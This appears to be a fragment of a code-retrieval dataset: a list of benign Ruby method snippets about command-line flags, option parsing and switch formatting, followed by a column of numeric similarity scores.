"def flags(path)\n if @manifest_entry ||= nil\n return manifest_entry.flags[path] || \"\"\n end\n pnode = parents[0].raw_changeset[0]\n \n orig = @repo.dirstate.copy_map[path] || path\n node, flag = @repo.manifest.find(pnode, orig)\n return @repo.dirstate.flags(@repo.working_join(path))\n end",
"def flag_to_string(flag)\n if flag.is_a?(Hash)\n flag.map do |key, value|\n \"#{flag_to_string(key)} #{value}\"\n end\n else\n str = flag.to_s\n str = \"--#{str}\" unless str.start_with?('--')\n str\n end\n end",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def extract_command_flags!(parameters)\n raw_command_flags = parameters.flatten.find_all { |arg| arg.start_with? \"--\" }\n parameters.delete_if { |param| raw_command_flags.include? param }\n\n flag_names = raw_command_flags.map { |flag| flag[/--(.+)$/,1].underscore.to_sym }\n flag_values = [ true ] * flag_names.count\n Hash[flag_names.zip(flag_values)]\n end",
"def flags(*args)\n Boxen::Flags.new *args\n end",
"def archetype_args\n tok = []\n @returns.map { |ent| tok << \"&#{ent.name}\" }\n @accepts.map { |ent| tok << ent.name }\n tok.join(', ')\n end",
"def range_all\n [ range(:upper_alphas), \n range(:lower_alphas), \n range(:numerals), \n range(:symbols_1), \n range(:symbols_2), \n range(:symbols_3), \n range(:symbols_4), \n range(:symbols_5), \n range(:symbols_6),\n range(:single_quotes),\n range(:double_quotes),\n range(:backtick) ]\n end",
"def option_list\n result = @options.dup\n result << \"-o\" << @rdoc_dir\n result << \"--main\" << main if main\n result << \"--markup\" << markup if markup\n result << \"--title\" << title if title\n result << \"-T\" << template if template\n result << '-f' << generator if generator\n result\n end",
"def to_switches(options)\n options.map do |key, value|\n case value\n when true\n \"--#{key}\"\n when Array\n \"--#{key} #{value.map { |v| v.inspect }.join(\" \")}\" unless value.empty?\n when Hash\n \"--#{key} #{value.map { |k, v| \"#{k}:#{v}\" }.join(\" \")}\" unless value.empty?\n when nil, false\n \"\"\n else\n \"--#{key} #{value.inspect}\"\n end\n end.join(\" \")\n end",
"def aliases\n @opt_aliases.keys.map {|e| undasherize e }\n end",
"def manual_description\n txt = (@flags.include?(:optional) ? '<' : '[') + @description\n if @type && @type != 'x'\n txt += _INTL(': {1}',@vararg ? '*'+type_name(@type) : type_name(@type))\n end\n txt += @flags.include?(:optional) ? '>' : ']'\n return txt\n end",
"def flag _args\n \"flag _args;\" \n end",
"def to_s(opts={})\n @registry.collect do |option|\n str = option.kind_of?(Flag) ? option.to_s(opts) : option.to_s\n str.rstrip\n end.join(\"\\n\") + \"\\n\"\n end",
"def cnf\n r = []\n @table.each {|inputs, output|\n return output.to_s if inputs.empty?\n next if output\n term = []\n each_input(inputs) {|name, input|\n if input\n term << \"!#{name}\"\n else\n term << name\n end\n }\n if term.length == 1\n r << term.join('|')\n else\n r << \"(#{term.join('|')})\"\n end\n }\n return \"true\" if r.empty?\n r.join(' & ')\n end",
"def compile_options\n str = String.new\n @options.each { |o| str = str + ' ' + o.compile }\n return str\n end",
"def test_multi_stringflag_as_strings\n opts = @p.parse %w(--xyz dog --xyz cat)\n assert_equal true, opts[:xyz_given]\n assert_equal [\"dog\",\"cat\"], opts[:xyz]\n assert_equal [], opts[:abc] # note, multi-args default to empty array\n assert_nil opts[:ghi_given]\n assert_equal [\"gg\",\"hh\"], opts[:ghi]\n end",
"def summary\n return desc.to_s.inspect unless desc.empty?\n flags.map(&:display_name).inspect\n end",
"def flags\n if variables\n (variables[:all][:referenced_enables] + variables[:all][:set_enables]).uniq.sort do |x, y|\n x = x[0] if x.is_a?(Array)\n y = y[0] if y.is_a?(Array)\n # Need to use strings for the comparison as some flags can be a string and some a symbol\n x.to_s <=> y.to_s\n end\n end\n end",
"def command_keywords\n dir_path = File.dirname(__FILE__)\n dirs = Dir.entries(dir_path)\n command_file_names = dirs.select{ |x| x.start_with?('_')}\n command_file_names.collect {|x| x.sub(/^_/, '')}\nend",
"def flags; end",
"def flag(*names)\n options = extract_options(names)\n names = [names].flatten\n\n verify_unused(names)\n flag = Flag.new(names,options)\n flags[flag.name] = flag\n\n clear_nexts\n flags_declaration_order << flag\n flag\n end",
"def optparse_args\n if short\n [\"--#{name}\", \"-#{short}\", desc, :REQUIRED]\n else\n [\"--#{name}\", desc, :REQUIRED]\n end\n end",
"def commands\n args.commands.map do |cmd|\n if cmd.respond_to?(:join)\n cmd.map { |c| c.index(' ') ? \"'#{c}'\" : c }.join(' ')\n else\n cmd.to_s\n end\n end\n end",
"def test_stringflag_as_flag\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w(--xyz )\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--xyz --abc)\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal true, opts[:abc]\n end",
"def quotelist( *args )\n\t\t\treturn args.flatten.collect {|part| part =~ /\\s/ ? part.inspect : part}\n\t\tend",
"def flag(*names)\n names = [names].flatten\n GLI.verify_unused(names,flags,switches,\"in command #{name}\")\n flag = Flag.new(names,@next_desc,@next_arg_name,@next_default_value,@next_long_desc)\n flags[flag.name] = flag\n clear_nexts\n end",
"def switches\n [long, negative_long, short].compact\n end",
"def stow_command_flags\n flags = ''\n flags += \"-t #{stow_target}\" unless stow_target.nil?\n flags += \"-d #{stow_path}\" unless stow_path.nil?\n flags\n end",
"def pragmas\n @pragmas.keys\n end",
"def list_with_comments\n require 'method_source'\n list.map { |short| [short, public_method(\"mutate_#{short}\").comment.strip] }\n end",
"def to_s()\n result = \"@#{@text}\"\n if !@flags.empty?\n result << \".\"\n end\n @flags.each do |f|\n char = Token::FLAG_CHARACTER[f]\n if char == nil\n result << \"?\"\n else\n result << char\n end\n end\n result\n end",
"def get_flags( options )\n flags = 0\n if options[:flags] then\n if options[:flags].respond_to?(:each) then\n options[:flags].each { |f| flags = flags | f }\n else\n flags = options[:flags]\n end\n end\n return flags\n end",
"def raw_options(options, indent=0)\n out = []\n options.each do |option|\n out << \"#{' '*indent}#{option};\"\n end if options\n out << ''\n end",
"def flags #:nodoc:\n @flags ||= {}\n end",
"def names_to_code(names)\n str = \"\"\n names.each do |name|\n code = ATTRIBUTES[name]\n if code\n str << \"\\e[#{code}m\"\n end\n end\n str\n end",
"def hints_string\n self.hints.map { |h| \"* #{h}\\n\\n\" }.join.rstrip\n end"
] | [
"0.7066683",
"0.69394684",
"0.6563283",
"0.65382355",
"0.65382355",
"0.64747995",
"0.63405854",
"0.63405854",
"0.6232747",
"0.6224358",
"0.61657566",
"0.61653584",
"0.6146682",
"0.6134414",
"0.6115361",
"0.608132",
"0.6080026",
"0.60568523",
"0.6056155",
"0.60351515",
"0.6029136",
"0.59376484",
"0.5856771",
"0.58437055",
"0.5837118",
"0.58360755",
"0.577462",
"0.57556",
"0.5750344",
"0.5707792",
"0.56873375",
"0.56656367",
"0.5653877",
"0.5587427",
"0.5569321",
"0.5564401",
"0.55634385",
"0.5560574",
"0.55404806",
"0.5537401",
"0.5532338",
"0.55115116",
"0.54455227",
"0.54197806",
"0.53977305",
"0.53976864",
"0.5393916",
"0.5386187",
"0.5376768",
"0.530059",
"0.5274476",
"0.527121",
"0.5235502",
"0.5230955",
"0.52290267",
"0.52289313",
"0.5177591",
"0.5170268",
"0.5167578",
"0.5165599",
"0.51607347",
"0.5156462",
"0.5151979",
"0.51478016",
"0.51446664",
"0.5143977",
"0.5143977",
"0.5107589",
"0.50894845",
"0.50861806",
"0.5078543",
"0.50770676",
"0.50675625",
"0.5063641",
"0.5061155",
"0.50409234",
"0.50339186",
"0.5030336",
"0.5029823",
"0.5002074",
"0.49934652",
"0.4992855",
"0.49871862",
"0.49793187",
"0.49698675",
"0.4956207",
"0.4941967",
"0.4934463",
"0.49321532",
"0.49207258",
"0.49200547",
"0.4918227",
"0.49136418",
"0.49132073",
"0.49064693",
"0.49049333",
"0.4900268",
"0.4899239",
"0.48899308",
"0.4885283"
] | 0.8113947 | 0 |
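The positive document in this row is a one-line memoizer: the first call maps each flag syntax object to its canonical string and caches the array in an instance variable, so later calls skip the map. A self-contained sketch of the pattern (the `FlagSyntax` struct and its field names are illustrative assumptions, not taken from the source):

    # Illustrative sketch of the ||= memoization pattern.
    FlagSyntax = Struct.new(:canonical_str, :flag_style)

    class FlagDefinition
      attr_reader :flag_syntax

      def initialize(flag_syntax)
        @flag_syntax = flag_syntax
      end

      # Computed once; cached in @canonical_syntax_strings thereafter.
      def canonical_syntax_strings
        @canonical_syntax_strings ||= flag_syntax.map(&:canonical_str)
      end
    end

    defn = FlagDefinition.new([FlagSyntax.new("--verbose", :long), FlagSyntax.new("-v", :short)])
    defn.canonical_syntax_strings # => ["--verbose", "-v"]

One caveat of `||=` memoization worth noting: if the computed result could legitimately be `nil` or `false`, the cache never takes effect; for a mapped array, as here, that cannot happen.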
Whether this flag is active; that is, it has a nonempty flags list. | def active?
!effective_flags.empty?
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def flags?\n !@flags.empty?\n end",
"def empty?\n flags.empty?\n end",
"def complete_flags?\n @complete_flags\n end",
"def flagged?\n !(%w(flagged) & flags).empty?\n end",
"def flagged?\n !(%w(flagged) & flags).empty?\n end",
"def is_flagged?\n return self.flags.unresolved.count > 0\n end",
"def active?\n @active.value\n end",
"def flagged?\n\t\t\t@flagged\n\t\tend",
"def active?\n @active != false\n end",
"def active?\n @_active_status ||= ( attributes.include?('active') ? !!self.active : true )\n end",
"def not_found?\n @flags.empty?\n end",
"def active?\n !!@active\n end",
"def flagged?\n @flagged\n end",
"def flagged?\n @flagged\n end",
"def active?\n @state.active?\n end",
"def complete_flag_values?\n @complete_flag_values\n end",
"def boolean\n any(true, false)\n end",
"def active?\n @active\n end",
"def active?\n @active\n end",
"def active?\n @active\n end",
"def enabled?\n state.nonzero?\n end",
"def active?\n true\n end",
"def active?\n active\n end",
"def active?\n\t\t@activation_count > 0\n\tend",
"def is_active?\n metadata[:inactive].nil? or !metadata[:inactive]\n end",
"def selectable?\n (%w(noselect) & self.flags).empty?\n end",
"def empty?\n bitmask.zero?\n end",
"def active?\n @active\n end",
"def active?\n @active\n end",
"def active?\n @active\n end",
"def active?\n true\n end",
"def active?\n @data[:active]\n end",
"def active?\n\t\tstatus == STATUSES[2]\n\tend",
"def active?\n active\n end",
"def flagged?(flag)\n self.flags.include? flag\n end",
"def flags\n @flags ||= Set.new([])\n end",
"def active?\n end",
"def active?\n end",
"def active?\n !(self.created? || self.suspended? || self.deleted? || self.closed? || self.resolved?)\n end",
"def active?\n ACTIVE_STATUSES.include?(self.status.to_sym)\n end",
"def active?\n if is_active\n return true\n else\n return false\n end\n end",
"def active?\n @active\n end",
"def active?\n\t\tactive\n\tend",
"def can_flag?\n !sent? && !flagged?\n end",
"def enemy_flag_exists?\n !(enemy_flags.empty?)\n end",
"def active?\n enabled\n end",
"def is_active(arg = nil) # rubocop: disable PredicateName\n set_or_return(:is_active, arg, kind_of: [TrueClass, FalseClass])\n end",
"def active?\n return @active\n end",
"def active?\n !activated_at.blank?\n end",
"def draft?\n !(%w(draft) & flags).empty?\n end",
"def active?\n if is_active\n return true\n else\n return false\n end\n end",
"def active?\n return false if status != :active\n !ended?\n end",
"def isActive()\n return @activationCount > 0\n end",
"def aDesActivites?\n self.activites.each do | a |\n if !a.gratuite\n return true\n end\n end\n false\n end",
"def enabled?\n any?(&:enabled?)\n end",
"def currently_active\n # check if tag is active\n if self.active == false\n return false\n end\n \n # check if time based activation is active\n if self.active_time\n unless current_time_active\n return false\n end\n end\n \n # check if date based activation is action\n if self.active_date\n unless current_date_active\n return false\n end\n end\n \n return true\n end",
"def active?\n self.internal_object['status'] == 'Active'\n end",
"def draft?\n !(%w(draft) & flags).empty?\n end",
"def active?\n 'Active' == self.status\n end",
"def active?\n self.active\n end",
"def active?\n self.active\n end",
"def active?\n\t\t\tstate == 'active'\n\t\tend",
"def active?\n active = false\n @mutex.synchronize { active = @active }\n return active\n end",
"def active?\n active\n end",
"def active?\n active\n end",
"def active?\n active\n end",
"def active?\n active\n end",
"def is_active?\n\t\tactive\n\tend",
"def pending?\r\n @activated\r\n end",
"def pending?\n @activated\n end",
"def IsActive()\r\n ret = _getproperty(1610743812, [], [])\r\n @lastargs = WIN32OLE::ARGV\r\n ret\r\n end",
"def IsActive()\r\n ret = _getproperty(1610743812, [], [])\r\n @lastargs = WIN32OLE::ARGV\r\n ret\r\n end",
"def active\n active?\n end",
"def pending?\n @activated\n end",
"def full?\n flags & 0x2 == 0x2\n end",
"def is_flagged?(feature)\n flags.include?feature\n end",
"def pending?\n @activated\n end",
"def active?\n\t\t\treturn account_life_cycle_status == ACTIVE \n\t\tend",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def active?\n !self.activated_at.nil?\n end",
"def exists_and_active?\n exists? and active?\n end",
"def is_active\n return @is_active\n end",
"def is_active\n return @is_active\n end",
"def active?\n activated == true\n end",
"def active?\n pc = PropertyChannel.active_only.find_by_property_id_and_channel_id(self.room_type.property.id, self.channel_id)\n if !pc.blank?\n # check if property is active\n if !pc.property.active?\n return false\n elsif self.disabled?\n return false\n else\n return true\n end\n else\n return false\n end\n end",
"def pending?\n @activated\n end",
"def pending?\n @activated\n end",
"def pending?\n @activated\n end",
"def pending?\n @activated\n end",
"def pending?\n @activated\n end",
"def pending?\n @activated\n end",
"def pending?\n @activated\n end",
"def found_unique?\n @flags.size == 1\n end",
"def active?\n !inactive\n end",
"def has_all_flags?(flag_names)\n flag_names.all? { |flag_name| has_flag?(flag_name) }\n end",
"def active?\n (status == ACTIVE)\n end",
"def active?\n (status == ACTIVE)\n end",
"def active?\n\t \tstatus.to_s == 'active'\n\tend",
"def active?\n true\n end"
] | [
"0.7888239",
"0.7835755",
"0.7354448",
"0.72545123",
"0.71221733",
"0.682791",
"0.6746434",
"0.6713567",
"0.66841596",
"0.6674785",
"0.66655344",
"0.6608056",
"0.6527947",
"0.6527947",
"0.6504524",
"0.65022874",
"0.64490014",
"0.64420986",
"0.64420986",
"0.64420986",
"0.64022875",
"0.639739",
"0.63872695",
"0.6380664",
"0.6378691",
"0.6378101",
"0.63744396",
"0.6372738",
"0.6372738",
"0.6372738",
"0.6362092",
"0.6358982",
"0.63556534",
"0.6353871",
"0.6347973",
"0.6344768",
"0.63368875",
"0.63368875",
"0.633218",
"0.63178355",
"0.62714595",
"0.62608105",
"0.62536603",
"0.62464285",
"0.6243773",
"0.6223576",
"0.62224585",
"0.62216735",
"0.6208574",
"0.620544",
"0.6189257",
"0.6179805",
"0.61613446",
"0.6159264",
"0.6158231",
"0.61494786",
"0.61448395",
"0.61347455",
"0.6131269",
"0.61301607",
"0.61301607",
"0.61268836",
"0.61242694",
"0.6110773",
"0.6110773",
"0.6110773",
"0.6110773",
"0.6107736",
"0.6081123",
"0.60743034",
"0.6071935",
"0.6071935",
"0.60648596",
"0.6064533",
"0.60437906",
"0.6040503",
"0.6034494",
"0.60253894",
"0.60226446",
"0.60226446",
"0.60096073",
"0.6003936",
"0.5995623",
"0.5995623",
"0.59937996",
"0.59869456",
"0.59720975",
"0.59720975",
"0.59720975",
"0.59720975",
"0.59720975",
"0.59720975",
"0.59720975",
"0.5970712",
"0.5969467",
"0.5966628",
"0.5965839",
"0.5965839",
"0.5958937",
"0.594558"
] | 0.81619895 | 0 |
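`active?` reduces to an emptiness check on `effective_flags`, which several of the negatives above show being built with `flat_map(&:flags)` over a flag syntax list. A small sketch connecting the two (the class shape and names are assumptions for illustration only):

    # Sketch only; the enclosing class is assumed.
    Syntax = Struct.new(:flags)

    class Flag
      def initialize(flag_syntax)
        @flag_syntax = flag_syntax
      end

      def effective_flags
        @effective_flags ||= @flag_syntax.flat_map(&:flags)
      end

      # Active means at least one usable flag string survived resolution.
      def active?
        !effective_flags.empty?
      end
    end

    Flag.new([Syntax.new(["--force", "-f"])]).active? # => true
    Flag.new([]).active?                              # => false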
GET /agencyfeed.json Get all the available agency feeds | def index
@agencyfeeds = AgencyFeed.all
render :index, status: :ok
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def feeds\n all.select { |c| c.google_id =~ /^feed/ }\n end",
"def index\n @feed_sources = FeedSource.all\n end",
"def index\n @feeds = Feed.all\n end",
"def index\n @feeds = Feed.all\n end",
"def index\n @feeds = Feed.all\n end",
"def index\n @feeds = Feed.all\n end",
"def index\n @feeds = Feed.all\n end",
"def list_feeds(_environment = 'test')\n ret = http_get('feeds')\n ret.map { |f| f['id'] }\n end",
"def index\n @feeds = Feed.all\n\n # fetching a single feed\n #@feed = Feedzirra::Feed.fetch_and_parse(\"http://feeds.feedburner.com/PaulDixExplainsNothing\")\n\n # @entries = @feed.entries\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @feeds }\n end\n end",
"def feed\n get '/users/self/feed', auth_params\n end",
"def index\n @feed_infos = FeedInfo.all\n end",
"def create\n @agencyfeed = AgencyFeed.create! agencyfeed_params\n render :show, status: :created\n end",
"def fetch_urls_from_feedly\n yaml = YAML.load_file('env.yaml')\n client = Feedlr::Client.new(oauth_access_token: yaml['account']['feedly']['access_token'])\n client.user_subscriptions.map{|m|\n # puts m.id\n hotentries = client.stream_entries_contents(m.id, :count => 5 ).items\n return hotentries\n };\nend",
"def index\n @feed = Feed.new\n @feeds = Feed.all :order => :title\n \n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @feeds }\n end\n end",
"def index\n @product_feeds = ProductFeed.all\n end",
"def index\n @agencies = Agency.all\n end",
"def get_data_feeds(merchant_id)\n uri = build_uri_for(@provider, {id: merchant_id})\n http = initialize_http(uri)\n\n request = Net::HTTP::Get.new(uri.request_uri)\n JSON( http.request(request).body )['Items'] \n end",
"def index\n @feed_items = FeedItem.all\n end",
"def index\n @feed_entries = FeedEntry.all\n end",
"def index\n @user_feeds = UserFeed.find_all_by_user_id(current_user.id)\n end",
"def index\n @breast_feedings = BreastFeeding.all\n end",
"def article_feed\n \tArticle.all\n end",
"def index\n @feed_items = @user.feed_items\n render json: @feed_items\n end",
"def feed\n @articles = Article.feed_list(current_user, params[:page])\n end",
"def feed\n @bookings = Booking.find_waiting_pickup\n respond_to do |format|\n format.rss\n end\n end",
"def show\n @feed = Feed.find(params[:id])\n @related_feeds = @feed.list_related_feeds(current_user)\n @feed_entries = Entry.where(feed_id: @feed.id).order(\"updated_at DESC\").page(params[:page]).per(10)\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @feed }\n end\n end",
"def index\n @admin_agencies = Admin::Agency.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @admin_agencies }\n end\n end",
"def index\n\n response = @api.get_list({:destinationString => 'Media', :stateProvinceCode => 'PA'})\n @hotels = response.body['HotelListResponse']['HotelList']['HotelSummary']\n\n end",
"def index\n @feed_urls = current_account.feed_urls.paginate(page: params[:page]).order(id: :desc)\n end",
"def index\n if (params['feed_id'] == nil) \n @sources = current_user.sources.order(\"name ASC\")\n render \"api/sources/index\"\n return\n end\n\n feed = Feed.find_by(id: params['feed_id'])\n\n if !feed \n render json: [\"Feed does not exist\"], status: 404 \n return\n elsif feed.user_id != current_user.id\n render json: [\"You don't own this feed \"], status: 401\n return\n end\n \n @sources = feed.sources\n render \"api/sources/index\"\n end",
"def show\n @feed = Feed.find(params[:id])\n #@feeds = Feed.from_users_followed_by(current_user)\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @feed }\n end\n end",
"def show\n @agencies = Agency.find(params[:id])\n\n if @agencies \n respond_to do |format|\n format.json { render :json => @agencies }\n format.xml { render :xml => @agencies }\n end \n else\n head :not_found\n end\n end",
"def index\n @campaigns = site.campaigns.by_campaign_and_day.all\n render :json => @campaigns\n end",
"def show\n @agencies = Agency.find(params[:id])\n\n if @agencies \n respond_to do |format|\n format.json { render :json => @agencies }\n format.xml { render :xml => @agencies }\n end \n else\n head :not_found\n end\n end",
"def show\n @feed = FlexibleFeeds::Feed.find(params[:id])\n\n render json: @feed\n end",
"def feed\n @feed_items = @repository.recent_feed_items\n respond_to do |format|\n format.html # feed.html.erb\n format.json { render json: @feed_items }\n end\n end",
"def index\n @agencies = current_user.agencies.all\n end",
"def index\n @feeds = Feed.find(:all)\n\n respond_to do |format|\n format.html # index.rhtml\n format.xml { render :xml => @feeds.to_xml }\n end\n end",
"def index\n params[:feeds] = current_user.feeds.collect { |item| item.id }\n if params[:feeds].count > 0\n @articles = Article.search(params)\n else\n @articles = []\n end\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @articles }\n end\n end",
"def retrieve_feed\n uri = URI.parse(@feed_url)\n Net::HTTP.get_response(uri).body\n end",
"def index\n @registering_agencies = RegisteringAgency.all\n end",
"def friend_feed(options={})\n get('/feed', options)\n end",
"def show\n @feed = Feed.find(params[:id])\n @posts = @feed.posts.order(\"published desc\").paginate(:page => params[:page], :per_page => 20)\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @feed }\n end\n end",
"def feed\r\n @posts = Post.all(:order => \"created_at DESC\")\r\n respond_to do |format|\r\n format.rss\r\n end\r\n end",
"def index\n @feeds = Feed.by_permission\n end",
"def index\n @feed_entries = FeedEntry.all\n @title = \"Feeds List\"\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @feed_entries }\n end\n end",
"def index\n @leads = Lead.upcoming\n .includes(:updates, :agents, :agent)\n .order(created_at: :desc)\n .page(params[:page])\n .per(50)\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @leads }\n end\n end",
"def index_feeds\n if @feeds.present?\n # Compose an array; each element is a hash containing the data necessary to render a feed in the JSON response\n @feeds_data = []\n @feeds.each do |feed|\n begin\n if @folder.nil?\n # If we're retrieving feeds regardless of folder, we have to find out in which folder is each feed, if any.\n folder_id = feed.user_folder(current_user)&.id || 'none'\n else\n # If we're retrieving feeds in a folder, we already know that all feeds are in this folder\n folder_id = @folder.id\n end\n\n unread_count = current_user.feed_unread_count feed\n\n data = {feed: feed, folder_id: folder_id, unread_count: unread_count}\n @feeds_data << data\n rescue NotSubscribedError => e\n # If the feed in the current iteration is no longer subscribed (e.g. because of an asynchrously running worker that has\n # unsubscribed it), just ignore it and continue with the next iteration\n Rails.logger.warn \"Listing subscribed feeds for user #{current_user.id} - #{current_user.email}, feed #{feed.id} is no longer subscribed, ignoring it\"\n end\n end\n\n respond_with @feeds_data\n else\n Rails.logger.info \"User #{current_user.id} - #{current_user.email} has no feeds to return, returning a 404\"\n head 404\n end\n end",
"def index\n @api_v1_graphs = Api::V1::Graph.all\n end",
"def challenge_feeds(challenge_id)\n # Safe max count is 500, >1000 exceeds salesforce non-admin limitation\n feeds = Challenge__Feed.query(\"parentId='#{challenge_id}' limit 500\")\n puts \"### Found #{feeds.size.to_s} Feeds\"\n return feeds\n end",
"def index\n @page_title = 'Feeds'\n if !@user.nil?\n @feeds = @user.feeds\n else\n @feeds = Feed.find(:all, :limit => 100)\n end\n render_index\n end",
"def feed_items\n feed_item\n end",
"def index\n @ads = @org.ads\n end",
"def feed\n @feeddata\n end",
"def index\n # Fetch all the categories the current user has preferred.\n @agencies = UsersAgency.preferrence_of current_user\n render template: 'api/v1/agencies/index', locals: { current_user: current_user }, status: :ok\n\n end",
"def feed!\n http_fetch(feed_url)\n end",
"def fetch\n feed_data = REXML::Document.new(open(@url, :proxy => true)).root\n parse(feed_data)\n end",
"def allergies\n raise UserNotAuthenticated unless access_token\n\n get('records/allergies')\n end",
"def index\n #body, ok = SuperfeedrEngine::Engine.retrieve(Feed.first) \n @entries = Entry.all\n end",
"def feed( params={} )\n feed = get_connections(\"feed\", params)\n return map_connections feed, :to => Facebook::Graph::Fee\n end",
"def fetch_news\n @news = News.fetch_and_store_news! @agencyfeed\n render template: 'news/list', status: :ok\n end",
"def all\n f = options[:format]\n a = options[:agency]\n ::Taxi::Status.list_all(format: f, agency: a)\n end",
"def feed( params={} )\n feed = get_connections(\"feed\", params)\n return map_connections feed, :to => Facebook::Graph::Generic\n end",
"def feed( params={} )\n feed = get_connections(\"feed\", params)\n return map_connections feed, :to => Facebook::Graph::Generic\n end",
"def index\n @allergies = Allergy.all\n end",
"def index\n @facebook_ads = FacebookAd.all\n end",
"def index\n # Load the latest full blog feed for Frank's blog as per \n @latest_blog_posts = load_blog_feed_for_url('http://blog.rietta.com/feeds/posts/default?alt=rss')\n \n # Load the latest posts for the Marketing label feed. Labels are case sensitive - Marketing != marketing\n # Please note that the example of the Google website has an error on its label example. The alt=rss comes after\n # the label in the feed URL\n @latest_marketing_posts = load_blog_feed_for_url('http://blog.rietta.com/feeds/posts/default/-/Marketing?alt=rss')\n \n # Load the latest posts for the SQL Converter label feed (space in the tag)\n @latest_sql_converter_posts = load_blog_feed_for_url('http://blog.rietta.com/feeds/posts/default/-/SQL%20Converter?alt=rss')\n end",
"def all_topics\n topics = Feed.find(params[:feed_id]).topics\n render :json => topics\n end",
"def feed_items\n []\n end",
"def fetch\n ##\n # an array of { category_id: number, news: array }\n @fetched = News.fetch_and_store_news_from_all_agency_feed!\n render :fetch, status: :ok\n end",
"def feed\n @blog_articles = BlogArticle.all\n respond_to do |format|\n format.rss { render layout: false }\n end\n end",
"def index\n id = params[:id].to_i\n\n if id != 0\n \t @agencies = @agencies.paginate(page: params[:page], per_page: 10).order(:name).find_all_by_id(id)\n if @agencies.any?\n @agency_name = @agencies.first.name\n end\n else\n \t @agencies = @agencies.paginate(page: params[:page], per_page: 10).order(:name).find(:all)\n end\n\n\t\t@records_returned = @agencies.count\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @agencies }\n end\n end",
"def feed\n feed_items =\n Photo\n .where(restaurant_id: params[:id])\n .includes(:owner, :tags, :fans)\n .order(created_at: :desc)\n .not_deleted\n .approved\n .paginate(page: params[:page], per_page: params[:per_page])\n\n expose feed_items, each_serializer: PhotoActivitySerializer\n end",
"def feed\n if current_user\n feed = []\n Event.where(user_id: current_user.id).each do |event|\n event.comments.each do |comment|\n if (DateTime.current - comment.created_at.to_datetime).to_f < (DateTime.current - current_user.last_sign_in.to_datetime).to_f\n feed << event.name << comment\n end\n end\n event.file_attachments.each do |file|\n if (DateTime.current - file.created_at.to_datetime).to_f < (DateTime.current - current_user.last_sign_in.to_datetime).to_f\n feed << event.name << file\n end\n end\n end\n respond_with feed\n else\n redirect_to root_path\n end\n end",
"def index\n if params[:id]\n @feed = Feed.find(params[:id])\n elsif params[:department_id]\n @department=Department.find(params[:department_id])\n @feeds = Feed.all.order({ updated_at: :desc })\n elsif params[:q]\n @feeds=Feed.search(params[:q])\n else\n @feeds = Feed.all.order({ updated_at: :desc })\n end\n end",
"def show\n @gtfs_agency = GtfsAgency.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @gtfs_agency }\n end\n end",
"def feeds\n profile = Profile.find(params[:id])\n profile.feeds\n redirect_to lato_profile_path(profile)\n end",
"def get_digg\n\nresponse = JSON.parse(RestClient.get 'http://digg.com/api/news/popular.json')\n# puts response['data']['feed'][0]['content']['title']\n\nstories = []\n\nresponse['data']['feed'].each do |story|\n\tstory_hash = {}\n\tstory_hash[:title] = story['content']['title']\n\tstory_hash[:category] = story['content']['tags'][0]['display']\n\tcalculate_upvotes(story_hash)\n\tstories.push(story_hash)\n\tend\n\tshow_all_stories(stories)\nend",
"def feed(name, options = {})\n if rel = feeds._links[name]\n get rel.href, :accept => rel.type, :options => options\n end\n end",
"def index\n @feeds = Feed.all.order(\"updated_at DESC\")\n end",
"def index\n @feeds = Feed.all\n @feed = Feed.new\n end",
"def show\n respond_to do |format|\n \tformat.html # show.html.erb\n \tformat.json { render json: @agency }\n end\n end",
"def index\n @advertisers = Advertiser.all\n end",
"def index\n @campaigns = Campaign.where(:live => true)\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @campaigns }\n end\n end",
"def feeds\n\t\tuser = User.find_by_id(params[:user_id])\n\t\tunless user\n\t\t\trender json: {error: \"user not fonud\"} and return\n\t\tend\n\t\tcq = CompletedQuest.where(user_id: user.friends.ids).order(created_at: :desc).limit(10)\n\t\tfeeds = []\n\t\tcq.each do |q|\n\t\t\thash = {}\n\t\t\thash[:quest] = q.quest\n\t\t\tfriend = q.user\n\t\t\tfriend.password = nil\n\t\t\thash[:friend] = friend\n\t\t\thash[:time] = q.created_at\n\t\t\tfeeds.push(hash)\n\t\tend\n\t\trender json: {feeds: feeds}\n\tend",
"def get_all_ach_funding_sources_with_http_info(opts = {})\n if @api_client.config.debugging\n @api_client.config.logger.debug 'Calling API: FundingSourcesApi.get_all_ach_funding_sources ...'\n end\n # resource path\n local_var_path = '/fundingsources/program/ach'\n\n # query parameters\n query_params = opts[:query_params] || {}\n query_params[:'count'] = opts[:'count'] if !opts[:'count'].nil?\n query_params[:'start_index'] = opts[:'start_index'] if !opts[:'start_index'].nil?\n query_params[:'fields'] = opts[:'fields'] if !opts[:'fields'].nil?\n query_params[:'sort_by'] = opts[:'sort_by'] if !opts[:'sort_by'].nil?\n\n # header parameters\n header_params = opts[:header_params] || {}\n # HTTP header 'Accept' (if needed)\n header_params['Accept'] = @api_client.select_header_accept(['application/json'])\n\n # form parameters\n form_params = opts[:form_params] || {}\n\n # http body (model)\n post_body = opts[:debug_body]\n\n # return_type\n return_type = opts[:debug_return_type] || 'ACHListResponse'\n\n # auth_names\n auth_names = opts[:debug_auth_names] || []\n\n new_options = opts.merge(\n :operation => :\"FundingSourcesApi.get_all_ach_funding_sources\",\n :header_params => header_params,\n :query_params => query_params,\n :form_params => form_params,\n :body => post_body,\n :auth_names => 